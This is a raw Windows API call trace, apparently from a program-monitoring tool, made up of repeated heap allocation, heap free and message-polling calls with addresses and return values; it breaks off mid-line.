[0119.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba3e8 | out: hHeap=0x12c0000) returned 1 [0119.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd00 | out: hHeap=0x12c0000) returned 1 [0119.534] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b310 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba580 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eddf0 [0119.534] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba580 | out: hHeap=0x12c0000) returned 1 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b540 [0119.534] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba508 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3e8 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eddb0 [0119.535] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba3e8 | out: hHeap=0x12c0000) returned 1 [0119.535] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eddb0 | out: hHeap=0x12c0000) returned 1 [0119.535] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b568 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3e8 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ede50 [0119.535] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba3e8 | out: hHeap=0x12c0000) returned 1 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b720 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba3e8 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5c8 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede70 [0119.535] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5c8 | out: hHeap=0x12c0000) returned 1 [0119.535] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede70 | out: hHeap=0x12c0000) returned 1 [0119.535] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b860 [0119.535] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba400 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ede80 [0119.536] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba400 | out: hHeap=0x12c0000) returned 1 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b590 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba400 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4c0 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede40 [0119.536] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4c0 | out: hHeap=0x12c0000) returned 1 [0119.536] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede40 | out: hHeap=0x12c0000) returned 1 [0119.536] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b8b0 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba520 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ede20 [0119.536] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba520 | out: hHeap=0x12c0000) returned 1 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b888 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba418 [0119.536] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba448 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede00 [0119.537] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba448 | out: hHeap=0x12c0000) returned 1 [0119.537] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede00 | out: hHeap=0x12c0000) returned 1 [0119.537] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b658 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba448 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edd30 [0119.537] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba448 | out: hHeap=0x12c0000) returned 1 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b608 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba520 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede90 [0119.537] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.537] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede90 | out: hHeap=0x12c0000) returned 1 [0119.537] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b4f0 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba448 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ede30 [0119.537] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba448 | out: hHeap=0x12c0000) returned 1 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b7c0 [0119.537] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba448 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba490 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edd60 [0119.538] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba490 | out: hHeap=0x12c0000) returned 1 [0119.538] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd60 | out: hHeap=0x12c0000) returned 1 [0119.538] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b748 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba490 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edd00 [0119.538] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba490 | out: hHeap=0x12c0000) returned 1 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b4c8 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba490 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edd50 [0119.538] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.538] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd50 | out: hHeap=0x12c0000) returned 1 [0119.538] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b8d8 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ede40 [0119.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b5b8 [0119.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4c0 [0119.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4d8 [0119.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edd60 [0119.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4d8 | out: hHeap=0x12c0000) returned 1 [0119.539] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd60 | out: hHeap=0x12c0000) returned 1 [0119.539] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b6d0 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4d8 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edd80 [0119.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba4d8 | out: hHeap=0x12c0000) returned 1 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b900 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba4d8 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede60 [0119.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede60 | out: hHeap=0x12c0000) returned 1 [0119.545] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b518 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edd20 [0119.545] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba550 | out: hHeap=0x12c0000) returned 1 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b450 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba550 [0119.545] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba580 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edd70 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba580 | out: hHeap=0x12c0000) returned 1 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd70 | out: hHeap=0x12c0000) returned 1 [0119.546] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b680 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba580 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edd40 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba580 | out: hHeap=0x12c0000) returned 1 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b630 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba580 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5b0 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eddc0 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5b0 | out: hHeap=0x12c0000) returned 1 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eddc0 | out: hHeap=0x12c0000) returned 1 [0119.546] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b6f8 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5b0 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ede70 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5b0 | out: hHeap=0x12c0000) returned 1 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b478 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5b0 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5c8 [0119.546] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12edd50 [0119.546] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5c8 | out: hHeap=0x12c0000) returned 1 [0119.547] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd50 | out: hHeap=0x12c0000) returned 1 [0119.547] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b838 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5c8 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edcf0 [0119.547] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5c8 | out: hHeap=0x12c0000) returned 1 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b770 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5c8 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5e0 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede90 [0119.547] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5e0 | out: hHeap=0x12c0000) returned 1 [0119.547] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede90 | out: hHeap=0x12c0000) returned 1 [0119.547] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b4a0 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5e0 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12edd70 [0119.547] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba5e0 | out: hHeap=0x12c0000) returned 1 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b928 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba5e0 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba8f8 [0119.547] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ede00 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba8f8 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede00 | out: hHeap=0x12c0000) returned 1 [0119.548] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.548] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x149b6a8 [0119.548] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14ba8e0 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba8e0 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7a8 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede60 | out: hHeap=0x12c0000) returned 1 [0119.548] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba9a0 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba850 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede00 | out: hHeap=0x12c0000) returned 1 [0119.548] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba730 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba760 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd10 | out: hHeap=0x12c0000) returned 1 [0119.548] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba8e0 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.548] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ede60 | out: hHeap=0x12c0000) returned 1 [0119.548] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7d8 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd50 | out: hHeap=0x12c0000) returned 1 [0119.549] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba8b0 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba898 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd50 | out: hHeap=0x12c0000) returned 1 [0119.549] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba880 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba730 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edcd0 | out: hHeap=0x12c0000) returned 1 [0119.549] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba970 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edeb0 | out: hHeap=0x12c0000) returned 1 [0119.549] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba970 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7c0 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edeb0 | out: hHeap=0x12c0000) returned 1 [0119.549] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba970 | out: hHeap=0x12c0000) returned 1 [0119.549] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eddb0 | out: hHeap=0x12c0000) returned 1 [0119.549] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba970 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eddb0 | out: hHeap=0x12c0000) returned 1 [0119.550] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7f0 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba910 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edcd0 | out: hHeap=0x12c0000) returned 1 [0119.550] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba970 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba718 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edce0 | out: hHeap=0x12c0000) returned 1 [0119.550] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba748 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba820 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd10 | out: hHeap=0x12c0000) returned 1 [0119.550] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba760 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba7d8 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd10 | out: hHeap=0x12c0000) returned 1 [0119.550] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba970 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14ba850 | out: hHeap=0x12c0000) returned 1 [0119.550] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12edd10 | out: 